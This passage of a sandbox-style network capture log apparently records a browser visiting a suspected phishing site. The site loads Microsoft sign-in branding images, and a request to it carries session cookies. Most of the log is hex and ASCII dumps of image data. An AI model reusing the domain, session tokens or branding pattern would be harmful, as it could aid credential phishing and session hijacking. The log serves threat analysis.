                                                              2024-07-03 07:41:13 UTC16383INData Raw: 1f 0c a9 79 76 61 cd 7b 0c 31 09 8f 77 17 13 7d e5 7f c3 ec ea b3 31 49 38 33 73 b3 a2 62 18 78 64 b1 7b 6b b1 ab 68 57 4b 12 d0 9c 6d a1 55 66 24 c1 87 11 b0 c0 e1 7b 0b 0b 74 20 1f bd 3b 78 69 e0 b9 e5 8f 6b 21 e6 ed e6 f9 aa 56 0c 9e 61 9f 97 96 6f 04 18 51 9c c6 34 5e 80 1b 2e 77 09 3f 57 77 9f da ba ec e9 29 30 71 79 b9 e3 0c f7 11 e3 17 d4 5f 82 a7 47 72 3e a5 c9 61 43 ea cf f0 2b c9 94 d6 58 ed e9 9e da bd 3a 7f 6c 41 3c a2 37 da bd 0a 3c d4 47 c3 77 0f 92 28 57 9e 4f 57 dd 10 47 f5 8d f6 af 45 12 91 1f 0c d4 70 db 75 ec e1 d7 56 5b 79 b9 bc 47 98 ce 57 e9 d3 ea e2 7c bd d7 7b 85 81 ee 08 64 69 7f 69 5c 46 2d 07 b8 c7 9c ca d4 f1 55 77 38 43 7f 73 a1 6f af b4 ae 7e 93 dd 93 5e a3 d9 1c 7c 6f b7 b3 9e 1f 32 cb c4 3f 84 43 f1 5a b3 1f 6f a7 29 cb e6
                                                              Data Ascii: yva{1w}1I83sbxd{khWKmUf${t ;xik!VaoQ4^.w?Ww)0qy_Gr>aC+X:lA<7<Gw(WOWGEpuV[yGW|{dii\F-Uw8Cso~^|o2?CZo)
                                                              2024-07-03 07:41:13 UTC16383INData Raw: 40 d2 2b 7b a9 81 f2 28 d0 13 e2 ca 1b 16 03 54 19 0d cd 14 22 8a 6d 75 50 c4 07 84 d8 e8 aa ba e3 aa d3 6d 09 20 e8 ab c6 95 f2 f8 98 6d c9 25 4b 19 e4 50 94 da 5d 4d 11 b4 75 14 40 ad b0 91 8d a0 bf a9 4c d3 4b 6c 9b 08 12 45 74 56 83 5a 05 6d e0 a5 ad 48 af 12 e1 44 2a 0d 80 56 a2 34 11 45 08 00 24 50 6d 01 ad 47 a1 4c c7 03 b8 a7 35 5d cd 24 8e 14 5a 48 34 4a 78 49 1e f5 07 45 5a 94 f3 a9 62 1b 55 44 7c a1 42 74 bd 55 88 af 12 9c 54 4c db 75 2c 40 09 b0 ba 67 0d 7c 55 60 cd d0 3a 74 45 2d b9 aa 05 3c 2e 91 d7 aa 25 03 a2 05 a8 b7 b1 2d f5 f4 a4 47 8a 4e ae a8 a6 8a 50 d5 38 3a 88 21 a6 be c4 07 88 f3 4f 6b bf 5a a6 57 9a 2d 34 14 2a 0b 10 88 69 a9 53 f7 9c 42 ca 95 68 69 a0 52 b0 e9 c9 4b 1a 8b 36 a1 07 cc 98 ea 53 40 80 89 4a 6e 83 e2 02 a2 9c d7 d2
                                                              Data Ascii: @+{(T"muPm m%KP]Mu@LKlEtVZmHD*V4E$PmGL5]$ZH4JxIEZbUD|BtUTLu,@g|U`:tE-<.%-GNP8:!OkZW-4*iSBhiRK6S@Jn


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              90192.168.2.662973152.199.21.1754434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:12 UTC691OUTGET /c1c6b6c8-d3sb-qm-hhdue0tq8clcu1b-m7tqgv0uyzh6-ekjzwq/logintenantbranding/0/bannerlogo?ts=637292763121529380 HTTP/1.1
                                                              Host: aadcdn.msauthimages.net
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                              Sec-Fetch-Site: cross-site
                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: image
                                                              Referer: https://vkwek.ckyucle.com/
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:41:13 UTC617INHTTP/1.1 200 OK
                                                              Accept-Ranges: bytes
                                                              Access-Control-Allow-Origin: *
                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                              Age: 69858
                                                              Cache-Control: public, max-age=86400
                                                              Content-MD5: R35LoruoIvW5BMqakVPeWg==
                                                              Content-Type: image/*
                                                              Date: Wed, 03 Jul 2024 07:41:12 GMT
                                                              Etag: 0x8D81E643C19B54E
                                                              Last-Modified: Thu, 02 Jul 2020 08:45:12 GMT
                                                              Server: ECAcc (lhc/7940)
                                                              X-Cache: HIT
                                                              x-ms-blob-type: BlockBlob
                                                              x-ms-lease-status: unlocked
                                                              x-ms-request-id: 97a73ebf-701e-0022-5579-cc4204000000
                                                              x-ms-version: 2009-09-19
                                                              Content-Length: 7753
                                                              Connection: close
                                                              2024-07-03 07:41:13 UTC7753INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 78 00 78 00 00 ff db 00 43 00 04 03 03 03 03 02 04 03 03 03 04 04 04 05 06 0a 06 06 05 05 06 0c 08 09 07 0a 0e 0c 0f 0e 0e 0c 0d 0d 0f 11 16 13 0f 10 15 11 0d 0d 13 1a 13 15 17 18 19 19 19 0f 12 1b 1d 1b 18 1d 16 18 19 18 ff db 00 43 01 04 04 04 06 05 06 0b 06 06 0b 18 10 0d 10 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 ff c0 00 11 08 00 48 01 30 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                              Data Ascii: JFIFxxCCH0"}!1AQa"q2


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              91192.168.2.662975188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:13 UTC1119OUTGET /rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2 HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept: */*
                                                              Sec-Fetch-Site: none
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6IlBVclJaQVlFbDN1TFJWVVNEMVk0eGc9PSIsInZhbHVlIjoiZStZajJPUkRoMld0SCtsck5VQU12ZUlSQmxjWGtpMW1qNDdzSXZRbDJRYU5mekpVK1BWcnY5amxJcnQrQzErMzZKK2pBR2FiaFI3ekhyOUlISDQxSGM3UlI2a1o1ckxPYks5dG9mTjZoQ3MzQ1p4U3MzZ0ZBTXI2T3JSOEhvZ2ciLCJtYWMiOiI3NDQ4MjRlNWQ5NjY3MGQwMTA1Y2NhYWY0NGQxMGYyODdlYzk4MWI0OTg3NWI2OGJlYjFmMjA3MzViNGE4YzM2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InJhdlh1anpmNWN2eTFaVXJXYjJvVWc9PSIsInZhbHVlIjoiNktDUnJKQWY1emd4YXFWSDdyMlNzNnQ1YytGa2pkZXM4V0ZWd0lrdzZoa3pmWWFRVUZSMlFVeXBjKytIcXR2MHZoY0drK29relBRNFNKWVY4QThZenNhb2FwdXJwMlJxUzlaaFVkUmlCcGNWbC9tcnlOajVydHM4S0JJQkk5ZFkiLCJtYWMiOiJjNmVlNTk0NGEzMTY4OWRlNWQyYWJmMDg4MmQwZGY5M2EzNWU2NmU1OWMxOTExZjQ0NzhiNmZmODE5OWY0ZjgxIiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:13 UTC583INHTTP/1.1 404 Not Found
                                                              Date: Wed, 03 Jul 2024 07:41:13 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9FyY8jlCi%2F4c38DrlGQVn%2B9cY2SnHA0qSQTJPRz%2F6kjxo3cIRyNG7O38Mbgk9DpOFhZ2EbmUVAyLtUU4H%2F83L1dONhtgfRMoHtDx%2B9CLOkABMcKzLgVVyQIFh0r8kA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b5f5a3843b8-EWR
                                                              2024-07-03 07:41:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              92192.168.2.662976152.199.21.1754434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:13 UTC454OUTGET /c1c6b6c8-d3sb-qm-hhdue0tq8clcu1b-m7tqgv0uyzh6-ekjzwq/logintenantbranding/0/bannerlogo?ts=637292763121529380 HTTP/1.1
                                                              Host: aadcdn.msauthimages.net
                                                              Connection: keep-alive
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept: */*
                                                              Sec-Fetch-Site: none
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:41:14 UTC617INHTTP/1.1 200 OK
                                                              Accept-Ranges: bytes
                                                              Access-Control-Allow-Origin: *
                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                              Age: 69860
                                                              Cache-Control: public, max-age=86400
                                                              Content-MD5: R35LoruoIvW5BMqakVPeWg==
                                                              Content-Type: image/*
                                                              Date: Wed, 03 Jul 2024 07:41:14 GMT
                                                              Etag: 0x8D81E643C19B54E
                                                              Last-Modified: Thu, 02 Jul 2020 08:45:12 GMT
                                                              Server: ECAcc (lhc/7940)
                                                              X-Cache: HIT
                                                              x-ms-blob-type: BlockBlob
                                                              x-ms-lease-status: unlocked
                                                              x-ms-request-id: 97a73ebf-701e-0022-5579-cc4204000000
                                                              x-ms-version: 2009-09-19
                                                              Content-Length: 7753
                                                              Connection: close
                                                              2024-07-03 07:41:14 UTC7753INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 78 00 78 00 00 ff db 00 43 00 04 03 03 03 03 02 04 03 03 03 04 04 04 05 06 0a 06 06 05 05 06 0c 08 09 07 0a 0e 0c 0f 0e 0e 0c 0d 0d 0f 11 16 13 0f 10 15 11 0d 0d 13 1a 13 15 17 18 19 19 19 0f 12 1b 1d 1b 18 1d 16 18 19 18 ff db 00 43 01 04 04 04 06 05 06 0b 06 06 0b 18 10 0d 10 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 ff c0 00 11 08 00 48 01 30 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                              Data Ascii: JFIFxxCCH0"}!1AQa"q2


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              93192.168.2.662977152.199.21.1754434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:14 UTC456OUTGET /c1c6b6c8-d3sb-qm-hhdue0tq8clcu1b-m7tqgv0uyzh6-ekjzwq/logintenantbranding/0/illustration?ts=637292768768790391 HTTP/1.1
                                                              Host: aadcdn.msauthimages.net
                                                              Connection: keep-alive
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept: */*
                                                              Sec-Fetch-Site: none
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:41:14 UTC619INHTTP/1.1 200 OK
                                                              Accept-Ranges: bytes
                                                              Access-Control-Allow-Origin: *
                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                              Age: 69860
                                                              Cache-Control: public, max-age=86400
                                                              Content-MD5: qdmxqkY5dM+rfCJTVThS8Q==
                                                              Content-Type: image/*
                                                              Date: Wed, 03 Jul 2024 07:41:14 GMT
                                                              Etag: 0x8D81E658CA6B7D6
                                                              Last-Modified: Thu, 02 Jul 2020 08:54:37 GMT
                                                              Server: ECAcc (lhc/7916)
                                                              X-Cache: HIT
                                                              x-ms-blob-type: BlockBlob
                                                              x-ms-lease-status: unlocked
                                                              x-ms-request-id: b7fea571-a01e-002b-8079-cc588a000000
                                                              x-ms-version: 2009-09-19
                                                              Content-Length: 290799
                                                              Connection: close
                                                              2024-07-03 07:41:14 UTC16383INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 01 2c 01 2c 00 00 ff e1 12 a6 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 0e 00 00 01 03 00 01 00 00 00 fb 0d 00 00 01 01 03 00 01 00 00 00 c3 07 00 00 02 01 03 00 05 00 00 00 b6 00 00 00 03 01 03 00 01 00 00 00 05 00 00 00 06 01 03 00 01 00 00 00 05 00 00 00 12 01 03 00 01 00 00 00 01 00 00 00 15 01 03 00 01 00 00 00 05 00 00 00 1a 01 05 00 01 00 00 00 c0 00 00 00 1b 01 05 00 01 00 00 00 c8 00 00 00 1c 01 03 00 01 00 00 00 01 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 31 01 02 00 1c 00 00 00 d0 00 00 00 32 01 02 00 14 00 00 00 ec 00 00 00 69 87 04 00 01 00 00 00 00 01 00 00 2c 01 00 00 08 00 08 00 08 00 08 00 08 00 2c 01 00 00 01 00 00 00 2c 01 00 00 01 00 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43
                                                              Data Ascii: JFIF,,ExifII*(12i,,,Adobe Photoshop C
                                                              2024-07-03 07:41:14 UTC16383INData Raw: 6f 2f 7a 2f 41 50 7a 46 4b 31 55 6a 36 69 35 31 4f 48 52 73 63 38 54 6b 4e 42 2b 7a 74 46 6f 49 49 64 6f 36 57 47 47 2b 26 23 78 41 3b 4a 51 4b 55 58 53 4c 78 5a 68 75 66 61 31 31 6a 6d 76 49 6e 4b 59 32 6d 77 36 4e 4f 6a 51 78 6f 6a 58 6c 4a 54 66 71 74 71 64 59 77 4e 72 72 61 58 44 64 49 49 6b 65 58 30 65 55 61 52 62 6a 76 79 62 42 31 66 59 35 32 51 57 65 75 26 23 78 41 3b 35 70 61 36 6c 6f 71 6a 54 6d 7a 30 35 32 2b 63 6f 4a 64 43 33 45 78 72 62 48 50 63 33 47 68 77 69 4e 4a 48 6e 4f 31 45 47 6b 45 49 2b 6f 4e 62 6a 39 4e 59 4b 70 41 4e 77 4a 2b 7a 4d 62 59 4e 5a 2f 4e 4c 53 41 45 69 56 55 78 36 26 23 78 41 3b 53 31 6a 71 58 32 58 52 5a 75 65 64 6f 79 57 73 71 63 30 44 54 52 72 61 78 6f 68 61 61 62 39 62 63 66 65 33 62 58 51 44 4f 68 61 52 50 79 39 71
                                                              Data Ascii: o/z/APzFK1Uj6i51OHRsc8TkNB+ztFoIIdo6WGG+&#xA;JQKUXSLxZhufa11jmvInKY2mw6NOjQxojXlJTfqtqdYwNrraXDdIIkeX0eUaRbjvybB1fY52QWeu&#xA;5pa6loqjTmz052+coJdC3ExrbHPc3GhwiNJHnO1EGkEI+oNbj9NYKpANwJ+zMbYNZ/NLSAEiVUx6&#xA;S1jqX2XRZuedoyWsqc0DTRraxohaab9bcfe3bXQDOhaRPy9q
                                                              2024-07-03 07:41:14 UTC16383INData Raw: 59 44 58 58 6b 69 35 7a 44 34 79 36 50 75 54 6c 41 32 33 68 59 78 30 6b 4f 6e 75 6b 6c 59 6d 52 79 6b 70 69 43 4f 79 53 48 6e 76 72 44 66 6a 32 75 47 78 38 37 52 46 68 42 45 65 51 6c 54 26 23 78 41 3b 59 2b 55 45 35 58 4a 61 65 63 6c 69 46 52 65 63 66 6e 59 7a 50 61 35 34 44 54 32 4c 67 41 54 38 79 32 65 66 4e 58 49 52 78 34 39 42 51 59 4a 79 79 5a 44 5a 31 59 74 36 7a 68 74 39 6c 62 77 58 6d 49 62 56 37 6a 38 76 54 72 62 2b 26 23 78 41 3b 56 4b 57 57 45 64 79 6f 59 70 4f 6e 67 6e 72 72 4c 47 5a 74 50 54 62 6e 4e 59 64 33 36 52 37 61 79 34 66 31 62 4c 5a 2f 42 55 38 6e 78 44 41 52 77 32 76 6a 68 6b 44 62 31 68 39 51 74 62 61 35 68 59 48 78 6f 59 4d 48 54 32 79 4e 26 23 78 41 3b 4a 55 4d 4a 43 51 73 4d 7a 44 57 50 39 6f 38 30 35 53 35 6d 59 2f 69 50 46 4a
                                                              Data Ascii: YDXXki5zD4y6PuTlA23hYx0kOnuklYmRykpiCOySHnvrDfj2uGx87RFhBEeQlT&#xA;Y+UE5XJaecliFRecfnYzPa54DT2LgAT8y2efNXIRx49BQYJyyZDZ1Yt6zht9lbwXmIbV7j8vTrb+&#xA;VKWWEdyoYpOngnrrLGZtPTbnNYd36R7ay4f1bLZ/BU8nxDARw2vjhkDb1h9Qtba5hYHxoYMHT2yN&#xA;JUMJCQsMzDWP9o805S5mY/iPFJ
                                                              2024-07-03 07:41:14 UTC16383INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                              Data Ascii:
                                                              2024-07-03 07:41:14 UTC16383INData Raw: 0e 43 54 75 e4 80 5c a3 4a 72 48 6b aa 2e 3a d3 55 54 09 a8 4b 64 2b a6 e9 56 c8 11 29 56 9a a6 d6 f6 29 6d 51 74 44 80 f5 46 bc aa 53 01 d5 10 45 68 50 3c 1b 23 54 ca f2 42 b7 f9 d0 3e a8 56 e9 b5 db 5f 14 b9 de e8 1f c5 44 81 35 4d ea 88 aa 22 50 4e fe 74 f6 9e 45 46 da ee 42 70 3c fc e8 89 c1 ea 3a a7 55 41 c5 40 9c d3 57 56 e8 89 c3 86 83 64 f0 e1 b2 af c6 00 34 47 bc a8 d5 05 83 13 9a 8d ee 3d 7c ca 2d f5 42 e6 88 24 0e 3e 9e 69 cd 51 b0 54 ea a5 a5 2c 35 dd 10 89 29 a4 52 f5 df 44 ff 00 04 c8 84 6c 8a 0e a5 13 01 3c 92 07 5a a6 39 d7 35 d1 50 e0 53 9b 7d 93 1a 2b 74 fd 3c 10 36 20 15 ea 80 f2 42 25 de 84 c7 3a 88 01 b9 51 bc d1 38 b8 79 94 6e 35 45 32 ba a5 5a a4 6b 5b a4 06 94 b9 55 29 e0 54 6a 49 4e 02 88 37 c4 23 5a 73 40 6b e6 44 9a 5a b4 4d 2e
                                                              Data Ascii: CTu\JrHk.:UTKd+V)V)mQtDFSEhP<#TB>V_D5M"PNtEFBp<:UA@WVd4G=|-B$>iQT,5)RDl<Z95PS}+t<6 B%:Q8yn5E2Zk[U)TjIN7#Zs@kDZM.
                                                              2024-07-03 07:41:14 UTC16383INData Raw: 6b 5a 37 24 d0 05 3e 7b c0 e3 e1 50 32 cc 9e 20 d8 7c 4f 9f 63 cb 41 e2 14 2f 70 a1 f4 27 35 ed 19 e3 ed 5e 5b 30 0f 96 0e d5 f6 05 a5 92 81 e1 9f 3c 9e 3c eb 43 b4 b8 50 e0 67 5c 6e 14 06 32 1c 36 4d 3d ad 63 05 03 45 a8 00 59 79 40 b8 09 de 0a 7b f1 52 57 4c 3b e7 8a e5 7f 6d 6c 63 77 91 8b e0 77 5c 0e 0e cf db 2e a7 de d1 7a 06 32 ca e1 f1 2f c4 43 4a e1 30 41 fb 60 db 92 cf 3c ff 00 52 45 e2 bf b6 a4 98 99 8f 86 47 74 48 55 b1 a9 69 d0 ae b3 2e 66 08 73 dc 2f 6b 80 89 a3 9a e3 4e 23 c8 f5 e4 55 6c c9 86 09 88 51 1e c0 03 e9 52 b8 38 7d ec 93 1f 16 0d a2 31 e1 a4 6b 6b ae 19 e1 97 0e 5f d3 a6 19 4e 48 f6 b8 ec 81 3f 2d 15 ae 68 73 4b 68 41 17 1f af eb c9 70 92 22 63 0a 83 06 2c 47 39 f2 af 27 85 e2 b5 84 6a 77 e4 a5 cb 39 95 93 2e 63 63 3f 82 28 6f 0d
                                                              Data Ascii: kZ7$>{P2 |OcA/p'5^[0<<CPg\n26M=cEYy@{RWL;mlcww\.z2/CJ0A`<REGtHUi.fs/kN#UlQR8}1kk_NH?-hsKhAp"c,G9'jw9.cc?(o
                                                              2024-07-03 07:41:14 UTC16383INData Raw: e5 c3 22 77 ac 15 64 4d 69 b1 59 a4 7a 57 49 31 0b bf 80 e8 74 ad 74 f1 5c f3 d8 5a e7 34 ea 0a ed 85 dc 70 cf 1d 5d 9a 6e 95 2d 74 34 4a a4 d7 92 db 98 38 80 2c 98 eb 8d 93 8f 22 80 d2 c8 a6 d6 94 44 11 ba 6b b5 a9 40 9d 90 d9 c5 d7 40 9a d1 04 74 28 1b e0 92 24 20 89 a2 49 21 a7 ca 92 29 78 23 e2 85 52 37 d5 50 b5 d1 38 0d f6 43 c1 14 12 06 de d5 48 84 99 7b 56 e9 ce 16 e8 88 60 02 db a4 4f 22 89 14 d1 30 d3 65 01 ad 4f 34 b8 b8 74 d1 26 d2 b7 ba 73 af c9 50 d2 78 90 aa 07 53 54 37 ba 28 87 90 7a 20 4d 4d 4a 14 f1 aa 55 d9 13 c1 1b 00 91 bf 44 b5 08 3a ba 6b cd 55 1b 73 42 b4 d4 59 21 d1 24 42 00 f9 ca 20 24 0e d4 48 03 51 5d 10 11 63 cd 3d b4 e2 b5 13 5a 2b a0 29 dc 3b a0 77 0b 49 09 ed f3 51 35 a0 d5 48 19 4f 3a 88 6b 85 46 fe 74 28 79 df 45 60 52 81
                                                              Data Ascii: "wdMiYzWI1tt\Z4p]n-t4J8,"Dk@@t($ I!)x#R7P8CH{V`O"0eO4t&sPxST7(z MMJUD:kUsBY!$B $HQ]c=Z+);wIQ5HO:kFt(yE`R
                                                              2024-07-03 07:41:14 UTC16383INData Raw: 7b 3b 57 1f 0c a9 79 76 61 cd 7b 0c 31 09 8f 77 17 13 7d e5 7f c3 ec ea b3 31 49 38 33 73 b3 a2 62 18 78 64 b1 7b 6b b1 ab 68 57 4b 12 d0 9c 6d a1 55 66 24 c1 87 11 b0 c0 e1 7b 0b 0b 74 20 1f bd 3b 78 69 e0 b9 e5 8f 6b 21 e6 ed e6 f9 aa 56 0c 9e 61 9f 97 96 6f 04 18 51 9c c6 34 5e 80 1b 2e 77 09 3f 57 77 9f da ba ec e9 29 30 71 79 b9 e3 0c f7 11 e3 17 d4 5f 82 a7 47 72 3e a5 c9 61 43 ea cf f0 2b c9 94 d6 58 ed e9 9e da bd 3a 7f 6c 41 3c a2 37 da bd 0a 3c d4 47 c3 77 0f 92 28 57 9e 4f 57 dd 10 47 f5 8d f6 af 45 12 91 1f 0c d4 70 db 75 ec e1 d7 56 5b 79 b9 bc 47 98 ce 57 e9 d3 ea e2 7c bd d7 7b 85 81 ee 08 64 69 7f 69 5c 46 2d 07 b8 c7 9c ca d4 f1 55 77 38 43 7f 73 a1 6f af b4 ae 7e 93 dd 93 5e a3 d9 1c 7c 6f b7 b3 9e 1f 32 cb c4 3f 84 43 f1 5a b3 1f 6f a7
                                                              Data Ascii: {;Wyva{1w}1I83sbxd{khWKmUf${t ;xik!VaoQ4^.w?Ww)0qy_Gr>aC+X:lA<7<Gw(WOWGEpuV[yGW|{dii\F-Uw8Cso~^|o2?CZo
                                                              2024-07-03 07:41:14 UTC16383INData Raw: ec 5d ef 40 d2 2b 7b a9 81 f2 28 d0 13 e2 ca 1b 16 03 54 19 0d cd 14 22 8a 6d 75 50 c4 07 84 d8 e8 aa ba e3 aa d3 6d 09 20 e8 ab c6 95 f2 f8 98 6d c9 25 4b 19 e4 50 94 da 5d 4d 11 b4 75 14 40 ad b0 91 8d a0 bf a9 4c d3 4b 6c 9b 08 12 45 74 56 83 5a 05 6d e0 a5 ad 48 af 12 e1 44 2a 0d 80 56 a2 34 11 45 08 00 24 50 6d 01 ad 47 a1 4c c7 03 b8 a7 35 5d cd 24 8e 14 5a 48 34 4a 78 49 1e f5 07 45 5a 94 f3 a9 62 1b 55 44 7c a1 42 74 bd 55 88 af 12 9c 54 4c db 75 2c 40 09 b0 ba 67 0d 7c 55 60 cd d0 3a 74 45 2d b9 aa 05 3c 2e 91 d7 aa 25 03 a2 05 a8 b7 b1 2d f5 f4 a4 47 8a 4e ae a8 a6 8a 50 d5 38 3a 88 21 a6 be c4 07 88 f3 4f 6b bf 5a a6 57 9a 2d 34 14 2a 0b 10 88 69 a9 53 f7 9c 42 ca 95 68 69 a0 52 b0 e9 c9 4b 1a 8b 36 a1 07 cc 98 ea 53 40 80 89 4a 6e 83 e2 02 a2
                                                              Data Ascii: ]@+{(T"muPm m%KP]Mu@LKlEtVZmHD*V4E$PmGL5]$ZH4JxIEZbUD|BtUTLu,@g|U`:tE-<.%-GNP8:!OkZW-4*iSBhiRK6S@Jn
                                                              2024-07-03 07:41:14 UTC16383INData Raw: c4 68 d0 34 03 a0 53 7d f4 be 11 f6 11 80 4a e6 0c db 0a 4e 74 c4 6c b9 96 8c e3 c0 68 4d 01 3a a7 43 92 f7 24 36 b2 04 47 34 b0 d2 8e d1 cb 5f e8 64 fb ba 85 f9 94 7f 61 53 4c c9 38 0e 2a 54 1b d9 5e ac a5 ec 99 59 ae ec b6 cf 8e 21 0a 75 94 b6 a7 4f 4a ab 39 85 42 8b 11 f1 a4 a2 70 44 a5 7c 93 af 88 dd 5e 8d 07 c9 e1 70 0e 6f de ba e3 fc 96 61 7c 39 79 8e ee 1c 50 c8 ba 88 51 1d eb 05 6e 67 86 7d ab 32 d9 e1 4b 07 c7 e7 24 62 46 87 18 70 c3 6c 42 c2 49 e2 61 f9 97 73 86 62 f2 f3 ad 03 88 43 8a 47 bd 71 d7 c0 ae 4b 0a 32 f1 1d 3b 2b 1c 52 39 7f 1b 98 eb 54 11 b6 c5 09 ac 22 2c ad 62 48 bf c8 d4 c3 3a 7f 92 e9 86 79 f1 f8 ef 13 2c 71 cf cb d0 05 ed 44 97 17 84 e6 38 b0 1c d8 33 61 c4 01 ef 1f ef 87 81 dd 75 b2 73 b0 27 19 c5 02 20 3c c6 e3 c4 2f 5e 1c b8
                                                              Data Ascii: h4S}JNtlhM:C$6G4_daSL8*T^Y!uOJ9BpD|^poa|9yPQng}2K$bFplBIasbCGqK2;+R9T",bH:y,qD83aus' </^


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              94192.168.2.66297840.113.103.199443
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:20 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 41 58 6e 6f 4e 66 66 48 63 55 71 45 2b 47 77 70 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 33 63 37 65 63 39 36 36 66 64 35 63 39 31 63 0d 0a 0d 0a
                                                              Data Ascii: CNT 1 CON 305MS-CV: AXnoNffHcUqE+Gwp.1Context: a3c7ec966fd5c91c
